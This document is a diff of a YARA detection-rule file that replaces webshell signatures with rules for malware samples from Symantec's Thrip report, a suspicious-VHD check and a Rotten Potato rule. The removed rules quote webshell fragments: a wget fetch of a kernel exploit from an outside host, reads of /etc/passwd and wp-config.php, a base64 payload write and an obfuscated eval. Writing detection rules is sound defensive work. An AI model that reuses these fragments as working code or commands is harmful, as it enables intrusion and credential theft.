+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L172-L189"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "51660ea25d1b2290c0ca30377dbf378cac8d7b7650603f1dbe5b7914c530d5cf"
-		score = 70
+		logic_hash = "79a8dfd63e96ccc9259272476e364e53b841b42255a2a5f3b9f93e91caa5d1c2"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6"
-		hash2 = "f51a5c5775d9cca0b137ddb28ff3831f4f394b7af6f6a868797b0df3dcdb01ba"
-		hash3 = "16b6ec4b80f404f4616e44d8c21978dcdad9f52c84d23ba27660ee8e00984ff2"
-		hash4 = "59105e4623433d5bf93b9e17d72a43a40a4d8ac99e4a703f1d8851ad1276cd88"
-		hash5 = "6dc417db9e07420a618d44217932ca8baf3541c08d5e68281e1be10af4280e4a"
-		hash6 = "5d07fdfee2dc6d81da26f05028f79badd10dec066909932129d398627b2f4e94"
-		hash7 = "1db0549066f294f814ec14ba4e9f63d88c4460d68477e5895236173df437d2b8"
-		hash8 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
-		hash9 = "59ea6cf16ea06ff47cf0e6a398df2eaec4d329707b8c3201fc63cbf0b7c85519"
-		hash10 = "0e0227a0001b38fb59fc07749e80c9d298ff0e6aca126ea8f4ea68ebc9a3661f"
-		hash11 = "ef74644065925aa8d64913f5f124fe73d8d289d5f019a104bf5f56689f49ba92"
+		hash1 = "350d2a6f8e6a4969ffbf75d9f9aae99e7b3a8cd8708fd66f977e07d7fbf842e3"
 
 	strings:
-		$s1 = "$_POST['cmd'] = which('" ascii
-		$s2 = "$blah = ex(" ascii
+		$x1 = "!This Program cannot be run in DOS mode." fullword ascii
+		$x2 = "!this program cannot be run in dos mode." fullword ascii
+		$s1 = "svchost.dll" fullword ascii
+		$s2 = "constructor or from DllMain." fullword ascii
 
 	condition:
-		filesize < 600KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( $x1 or 2 of them )
 }
-rule SIGNATURE_BASE_Webshell_C100 : FILE
+
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_11 : FILE
 {
 	meta:
-		description = "Detects Webshell - rule generated from from files c100 v. 777shell"
+		description = "Detects sample found in Thrip report by Symantec "
 		author = "Florian Roth (Nextron Systems)"
-		id = "aa8317ff-680d-5b60-b8a9-a77ea58f0ed0"
-		date = "2016-01-11"
-		modified = "2025-11-03"
-		reference = "https://github.com/nikicat/web-malware-collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9402-L9426"
+		id = "69476f7d-c436-5863-bf20-1d3e821974e6"
+		date = "2018-06-21"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L191-L210"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cc8c59f70f5ec6c89812b1597e9b864e358593ea5782e359cd483dee1a84b28b"
-		score = 70
+		logic_hash = "066fc3622a0db5cc511e85f6efc08191c2c9268524c8761dc17a05e6d133c263"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
-		hash2 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
-		hash3 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
-		hash4 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
-		hash5 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
-		hash6 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
-		hash7 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
+		hash1 = "590a6796b97469f8e6977832a63c0964464901f075a9651f7f1b4578e55bd8c8"
 
 	strings:
-		$s0 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">Kernel attack (Krad.c) PT1 (If wget installed)" fullword ascii
-		$s1 = "<center>Kernel Info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">" fullword ascii
-		$s3 = "cut -d: -f1,2,3 /etc/passwd | grep ::" ascii
-		$s4 = "which wget curl w3m lynx" ascii
-		$s6 = "netstat -atup | grep IST" ascii
+		$s1 = "\\AppData\\Local\\Temp\\dw20.EXE" ascii
+		$s2 = "C:\\Windows\\system32\\sysprep\\cryptbase.dll" fullword ascii
+		$s3 = "WFQNJMBWF" fullword ascii
+		$s4 = "SQLWLWZSF" fullword ascii
+		$s5 = "PFQUFQSBPP" fullword ascii
+		$s6 = "WQZXQFPVOW" fullword ascii
 
 	condition:
-		filesize < 685KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "6eef4394490378f32d134ab3bf4bf194" or all of them )
 }
-rule SIGNATURE_BASE_Webshell_Acidpoison : FILE
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_12 : FILE
 {
 	meta:
-		description = "Detects Poison Sh3ll - Webshell"
+		description = "Detects sample found in Thrip report by Symantec "
 		author = "Florian Roth (Nextron Systems)"
-		id = "6c201221-ca67-57fb-9bc7-fab4fc1da982"
-		date = "2016-01-11"
-		modified = "2025-11-03"
-		reference = "https://github.com/nikicat/web-malware-collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9428-L9451"
+		id = "b24b8042-b6a3-5af8-9fcf-6d042bdb9524"
+		date = "2018-06-21"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L212-L234"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "31add38bcdc33d5e4b825bfa18ff1a47d5aa5aaeebd8e3adac533c471aa30629"
-		score = 70
+		logic_hash = "49357a34f3b1d0bb86d1c6ddfa6a6c3b92bfafaebd050d835c0a902199a2121b"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
-		hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
-		hash3 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
-		hash4 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
-		hash5 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
-		hash6 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
-		hash7 = "be541cf880a8e389a0767b85f1686443f35b508d1975ee25e1ce3f08fa32cfb5"
-		hash8 = "be541cf880a8e389a0767b85f1686443f35b508d1975ee25e1ce3f08fa32cfb5"
-		hash9 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
-		hash10 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
+		hash1 = "33c01d3266fe6a70e8785efaf10208f869ae58a17fd9cdb2c6995324c9a01062"
 
 	strings:
-		$s1 = "elseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }" fullword ascii
+		$s1 = "pGlobal->nOSType==64--%s\\cmd.exe %s" fullword ascii
+		$s2 = "httpcom.log" fullword ascii
+		$s3 = "\\CryptBase.dll" ascii
+		$s4 = "gupdate.exe" fullword ascii
+		$s5 = "wusa.exe" fullword ascii
+		$s6 = " %s %s /quiet /extract:%s\\%s\\" ascii
+		$s7 = "%s%s.dll.cab" fullword ascii
+		$s8 = "/c %s\\%s\\%s%s %s" fullword ascii
+		$s9 = "ReleaseEvildll" fullword ascii
+		$s0 = "%s\\%s\\%s%s" fullword ascii
 
 	condition:
-		filesize < 550KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 6 of them
 }
-rule SIGNATURE_BASE_Webshell_Acid_Fatalisticz_Fx_Fx_P0Ison_Sh3Ll_X0Rg_Byp4Ss_256 : FILE
+
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_13 : FILE
 {
 	meta:
-		description = "Detects Webshell"
+		description = "Detects sample found in Thrip report by Symantec "
 		author = "Florian Roth (Nextron Systems)"
-		id = "80f7d202-adb8-5d9c-b176-576e3b9553c1"
-		date = "2016-01-11"
-		modified = "2025-11-03"
-		reference = "https://github.com/nikicat/web-malware-collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9453-L9472"
+		id = "e6aec6f3-2024-5fb2-b37a-77a182684d32"
+		date = "2018-06-21"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L236-L254"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "07cd255247c9a77b1c9b6049a2b96632252ea9572880b10991c6797c14a05d48"
-		score = 70
+		logic_hash = "3c319a3ca78687cd2af77d97b4b4a8e72dadd812bf3da2145a23df278c3aa9a2"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
-		hash2 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
-		hash3 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
-		hash4 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
-		hash5 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
+		hash1 = "780620521c92aab3d592b3dc149cbf58751ea285cfdaa50510002b441796b312"
 
 	strings:
-		$s0 = "<form method=\"POST\"><input type=hidden name=act value=\"ls\">" fullword ascii
-		$s2 = "foreach($quicklaunch2 as $item) {" fullword ascii
+		$s1 = "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" fullword ascii
+		$s2 = "<member><name>password</name>" fullword ascii
+		$s3 = "<value><string>qqtorspy</string></value>" fullword ascii
+		$s4 = "SOFTWARE\\QKitTORSPY" fullword wide
+		$s5 = "ipecho.net" fullword ascii
 
 	condition:
-		filesize < 882KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "3dfad33b2fb66c083c99dc10341908b7" or 4 of them )
 }
-rule SIGNATURE_BASE_Webshell_Ayyildiz : FILE
+
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_14 : FILE
 {
 	meta:
-		description = "Detects Webshell"
+		description = "Detects sample found in Thrip report by Symantec "
 		author = "Florian Roth (Nextron Systems)"
-		id = "cc752958-eb6c-5185-b94c-5fcec833924d"
-		date = "2016-01-11"
-		modified = "2025-11-03"
-		reference = "https://github.com/nikicat/web-malware-collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9474-L9493"
+		id = "736e2700-cdcb-5165-b786-67edaef765b6"
+		date = "2018-06-21"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L256-L276"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8441b7d730e337e002eeb7ae8f489e405409ddbe62f45bbc9a74c935d1d9fe66"
-		score = 70
+		logic_hash = "c96a40495bc2a17a6215c877ad054bd2e1e10c524c2d54da1955d370b9ccdcd7"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0e25aec0a9131e8c7bd7d5004c5c5ffad0e3297f386675bccc07f6ea527dded5"
-		hash2 = "9c43aada0d5429f8c47595f79a7cdd5d4eb2ba5c559fb5da5a518a6c8c7c330a"
-		hash3 = "2ebf3e5f5dde4a27bbd60e15c464e08245a35d15cc370b4be6b011aa7a46eaca"
-		hash4 = "77a63b26f52ba341dd2f5e8bbf5daf05ebbdef6b3f7e81cec44ce97680e820f9"
-		hash5 = "61c4fcb6e788c0dffcf0b672ae42b1676f8a9beaa6ec7453fc59ad821a4a8127"
+		hash1 = "67dd44a8fbf6de94c4589cf08aa5757b785b26e49e29488e9748189e13d90fb3"
 
 	strings:
-		$s0 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">Parent Directory</option>\\n\";" fullword ascii
-		$s1 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";" fullword ascii
+		$s1 = "%SystemRoot%\\System32\\svchost.exe -k " fullword ascii
+		$s2 = "spdirs.dll" fullword ascii
+		$s3 = "Provides storm installation services such as Publish, and Remove." fullword ascii
+		$s4 = "RegSetValueEx(Svchost\\netsvcs)" fullword ascii
+		$s5 = "Load %s Error" fullword ascii
 
 	condition:
-		filesize < 112KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( ( pe.exports ( "InstallA" ) and pe.exports ( "InstallB" ) and pe.exports ( "InstallC" ) ) or all of them )
 }
-rule SIGNATURE_BASE_Webshell_Zehir : FILE
+
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_15 : FILE
 {
 	meta:
-		description = "Detects Webshell - rule generated from from files elmaliseker.asp, zehir.asp, zehir.txt, zehir4.asp, zehir4.txt"
+		description = "Detects sample found in Thrip report by Symantec "
 		author = "Florian Roth (Nextron Systems)"
-		id = "7f8f15a6-1c5b-5c75-b61a-df7b18699f5a"
-		date = "2016-01-11"
-		modified = "2025-11-03"
-		reference = "https://github.com/nikicat/web-malware-collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9495-L9514"
+		id = "fd8aa404-4c12-5c8f-a952-a143da858b9b"
+		date = "2018-06-21"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L278-L299"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c8fda66ada3581d2471b322ae65032b68c69b882c29f7469dd2ed78800c9c5f7"
-		score = 70
+		logic_hash = "22769d215e52965f48eb3455b39fbd8f8ce950a67f8132612d42b78fde9822a5"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "16e1e886576d0c70af0f96e3ccedfd2e72b8b7640f817c08a82b95ff5d4b1218"
-		hash2 = "0c5f8a2ed62d10986a2dd39f52886c0900a18c03d6d279207b8de8e2ed14adf6"
-		hash3 = "cb9d5427a83a0fc887e49f07f20849985bd2c3850f272ae1e059a08ac411ff66"
-		hash4 = "b57bf397984545f419045391b56dcaf7b0bed8b6ee331b5c46cee35c92ffa13d"
-		hash5 = "febf37a9e8ba8ece863f506ae32ad398115106cc849a9954cbc0277474cdba5c"
+		hash1 = "231c569f11460a12b171f131c40a6f25d8416954b35c28ae184aba8a649d9786"
 
 	strings:
-		$s1 = "for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';" fullword ascii
-		$s2 = "if (frmUpload.max.value<=0) frmUpload.max.value=1;" fullword ascii
+		$s1 = "%s\\cmd.exe /c %s" fullword ascii
+		$s2 = "CryptBase.dll" fullword ascii
+		$s3 = "gupdate.exe" fullword ascii
+		$s4 = "wusa.exe" fullword ascii
+		$s5 = " %s %s /quiet /extract:%s\\%s\\" ascii
+		$s6 = "%s%s.dll.cab" fullword ascii
+		$s7 = "%s\\%s\\%s%s %s" fullword ascii
+		$s8 = "%s\\%s\\%s%s" fullword ascii
 
 	condition:
-		filesize < 200KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "f6ec70a295000ab0a753aa708e9439b4" or 6 of them )
 }
-rule SIGNATURE_BASE_Uploadshell_98038F1Efa4203432349Badabad76D44337319A6 : FILE
+
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_16 : FILE
 {
 	meta:
-		description = "Detects a web shell"
+		description = "Detects sample found in Thrip report by Symantec "
 		author = "Florian Roth (Nextron Systems)"
-		id = "f385b091-ce0d-5d5b-8eeb-57e00c8d0210"
-		date = "2016-09-10"
-		modified = "2025-11-03"
-		reference = "https://github.com/bartblaze/PHP-backdoors"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9525-L9540"
+		id = "58be9a1b-2228-5d7a-97c9-198cacbe1a66"
+		date = "2018-06-21"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L301-L317"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "68f0de84a387a9af1a32dd8d38c66b002e16e1c954a51e6bc307580180faedbf"
+		logic_hash = "950ece29e8fd056e3506684bce9b16eb185d63c1b020e4911972f5fcbdadbe30"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "506a6ab6c49e904b4adc1f969c91e4f1a7dde164be549c6440e766de36c93215"
+		hash1 = "2b1c1c6d82837dbbccd171a0413c1d761b1f7c3668a21c63ca06143e731f030e"
 
 	strings:
-		$s2 = "$lol = file_get_contents(\"../../../../../wp-config.php\");" fullword ascii
-		$s6 = "@unlink(\"./export-check-settings.php\");" fullword ascii
-		$s7 = "$xos = \"Safe-mode:[Safe-mode:\".$hsafemode.\"] " fullword ascii
+		$s1 = "[%d] Failed, %08X" fullword ascii
+		$s2 = "woqunimalegebi" fullword ascii
+		$s3 = "[%d] Offset can not fetched." fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x3f3c and filesize < 6KB and ( all of ( $s* ) ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( all of them or pe.imphash ( ) == "c6a4c95d868a3327a62c9c45f5e15bbf" )
 }
-rule SIGNATURE_BASE_Dkshell_F0772Be3C95802A2D1E7A4A3F5A45Dcdef6997F3 : FILE
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_17 : FILE
 {
 	meta:
-		description = "Detects a web shell"
+		description = "Detects sample found in Thrip report by Symantec "
 		author = "Florian Roth (Nextron Systems)"
-		id = "161ceca6-f5e8-5bcf-bc31-2a2169b1a1c7"
-		date = "2016-09-10"
-		modified = "2025-11-03"
-		reference = "https://github.com/bartblaze/PHP-backdoors"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9542-L9556"
+		id = "e314a893-1ef5-5d5f-b056-af25765c0b70"
+		date = "2018-06-21"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L319-L343"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "81b0a08d1b9d3640e656a5cd08b79c0a2f940a2db5c2d939d19509f993514e86"
+		logic_hash = "0724e07614e704d9ac8a1ae4aecfcf3d9800dde6f83eeecc8427ab6205e321a6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7ea49d5c29f1242f81f2393b514798ff7caccb50d46c60bdfcf61db00043473b"
+		hash1 = "05036de73c695f59adf818d3c669c48ce8626139d463b8a7e869d8155e5c0d85"
+		hash2 = "08d8c610e1ec4a02364cb53ba44e3ca5d46e8a177a0ecd50a1ef7b5db252701d"
+		hash3 = "14535607d9a7853f13e8bf63b629e3a19246ed9db6b4d2de2ca85ec7a7bee140"
 
 	strings:
-		$s1 = "<?php Error_Reporting(0); $s_pass = \"" ascii
-		$s2 = "$s_func=\"cr\".\"eat\".\"e_fun\".\"cti\".\"on" ascii
+		$x1 = "c:\\users\\administrator\\desktop\\code\\skeyman2\\" ascii
+		$x2 = "\\SkeyMan2.pdb" ascii
+		$x3 = "\\\\.\\Pnpkb" fullword ascii
+		$s1 = "\\DosDevices\\Pnpkb" wide
+		$s2 = "\\DosDevices\\PnpKb" wide
+		$s3 = "\\Driver\\kbdhid" wide
+		$s4 = "\\Device\\PnpKb" wide
+		$s5 = "Microsoft  Windows Operating System" fullword wide
+		$s6 = "hDevice == INVALID_HANDLE_VALUE" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x3c0a and filesize < 300KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 20KB and ( 1 of ( $x* ) and 1 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Unknown_8Af033424F9590A15472A23Cc3236E68070B952E : FILE
+rule SIGNATURE_BASE_APT_Thrip_Sample_Jun18_18 : FILE
 {
 	meta:
-		description = "Detects a web shell"
+		description = "Detects sample found in Thrip report by Symantec "
 		author = "Florian Roth (Nextron Systems)"
-		id = "fcf467b6-f49a-52d0-a57f-9f3cf6d0b25b"
-		date = "2016-09-10"
-		modified = "2025-11-03"
-		reference = "https://github.com/bartblaze/PHP-backdoors"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9558-L9573"
+		id = "20642526-5a4d-5dca-a6f5-29f19a9b5271"
+		date = "2018-06-21"
+		modified = "2023-12-05"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets "
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_thrip.yar#L345-L367"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d7dc9a2a5e0800b5061cb2101d7cda023a6e637f1e7b14054fdb6a0b2cec6084"
+		logic_hash = "5cac313bd77900e67f0528d660671394915dff7159ca6fa067fd9c392d7c269a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3382b5eaaa9ad651ab4793e807032650667f9d64356676a16ae3e9b02740ccf3"
+		hash1 = "33029f5364209e05481cfb2a4172c6dc157b0070f51c05dd34485b8e8da6e820"
+		hash2 = "263c01a3b822722dc288a5ac138d953630d8c548a0bee080ae3979b7d364cecb"
+		hash3 = "52d190a8d20b4845551b8765cbd12cfbe04cf23e6812e238e5a5023c34ee9b37"
+		hash4 = "1f019e3c30a02b7b65f7984903af11d561d02b2666cc16463c274a2a0e62145d"
+		hash5 = "43904ea071d4dce62a21c69b8d6efb47bcb24c467c6f6b3a6a6ed6cd2158bfe5"
+		hash6 = "00d9da2b665070d674acdbb7c8f25a01086b7ca39d482d55f08717f7383ee26a"
 
 	strings:
-		$s1 = "$check = $_SERVER['DOCUMENT_ROOT']" fullword ascii
-		$s2 = "$fp=fopen(\"$check\",\"w+\");" fullword ascii
-		$s3 = "fwrite($fp,base64_decode('" ascii
+		$s1 = "Windows 95/98/Me, Windows NT 4.0, Windows 2000/XP: IME PROCESS key" fullword ascii
+		$s2 = "Windows 2000/XP: Either the angle bracket key or the backslash key on the RT 102-key keyboard" fullword ascii
+		$s3 = "LoadLibraryA() failed in KbdGetProcAddressByName()" fullword ascii
+		$s5 = "Unknown Virtual-Key Code" fullword ascii
+		$s6 = "Computer Sleep key" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x6324 and filesize < 6KB and ( all of ( $s* ) ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_Dkshell_4000Bd83451F0D8501A9Dfad60Dce39E55Ae167D : FILE
+rule SIGNATURE_BASE_SUSP_VHD_Suspicious_Small_Size : FILE
 {
 	meta:
-		description = "Detects a web shell"
+		description = "Detects suspicious VHD files"
 		author = "Florian Roth (Nextron Systems)"
-		id = "804f7229-1440-5a2e-91cd-a58a38b22aa9"
-		date = "2016-09-10"
-		modified = "2025-11-03"
-		reference = "https://github.com/bartblaze/PHP-backdoors"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9575-L9593"
+		id = "f4a72e7b-ddd3-5038-9440-1e81dc27755d"
+		date = "2019-12-21"
+		modified = "2023-01-27"
+		reference = "https://twitter.com/MeltX0R/status/1208095892877774850"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_vhd_anomaly.yar#L2-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "26d586e32d1b0b7800b4b61f592dadc3dd0583628e4cd3fa4e24e02067077da5"
-		score = 75
-		quality = 85
+		logic_hash = "0bd5b113714854feaa89d52d4bab6a4a00f0dcb7fd816fa7b036eb43d3ea0dd8"
+		score = 50
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "51a16b09520a3e063adf10ff5192015729a5de1add8341a43da5326e626315bd"
+		hash1 = "3382a75bd959d2194c4b1a8885df93e8770f4ebaeaff441a5180ceadf1656cd9"
 
 	strings:
-		$x1 = "DK Shell - Took the Best made it Better..!!" fullword ascii
-		$x2 = "preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6C\\x61\\x74\\x65\\x28\\x62\\x61\\x73\\x65\\x36\\x" ascii
-		$x3 = "echo '<b>Sw Bilgi<br><br>'.php_uname().'<br></b>';" fullword ascii
-		$s1 = "echo '<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">';" fullword ascii
-		$s9 = "$x = $_GET[\"x\"];" fullword ascii
+		$hc1 = { 63 6F 6E 65 63 74 69 78 }
+		$hc2a = { 49 6E 76 61 6C 69 64 20 70 61 72 74 69 74 69 6F
+               6E 20 74 61 62 6C 65 00 45 72 72 6F 72 20 6C 6F
+               61 64 69 6E 67 20 6F 70 65 72 61 74 69 6E 67 20
+               73 79 73 74 65 6D 00 4D 69 73 73 69 6E 67 20 6F
+               70 65 72 61 74 69 6E 67 20 73 79 73 74 65 6D }
+		$hc2b = "connectix"
 
 	condition:
-		( uint16( 0 ) == 0x3f3c and filesize < 200KB and 1 of ( $x* ) ) or ( 3 of them )
+		not uint16( 0 ) == 0x5a4d and filesize > 1KB and filesize <= 4000KB and ( $hc1 at 0 or all of ( $hc2* ) )
 }
-rule SIGNATURE_BASE_Webshell_5786D7D9F4B0Df731D79Ed927Fb5A124195Fc901 : FILE
+rule SIGNATURE_BASE_Rottenpotato_Potato : FILE
 {
 	meta:
-		description = "Detects a web shell"
+		description = "Detects a component of privilege escalation tool Rotten Potato - file Potato.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7958e5fc-5ac5-58bc-8128-0a778e99a4e4"
-		date = "2016-09-10"
-		modified = "2025-11-03"
-		reference = "https://github.com/bartblaze/PHP-backdoors"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L9595-L9609"
+		id = "4a12783c-f58a-518b-a80a-f09f146304cc"
+		date = "2017-02-07"
+		modified = "2022-12-21"
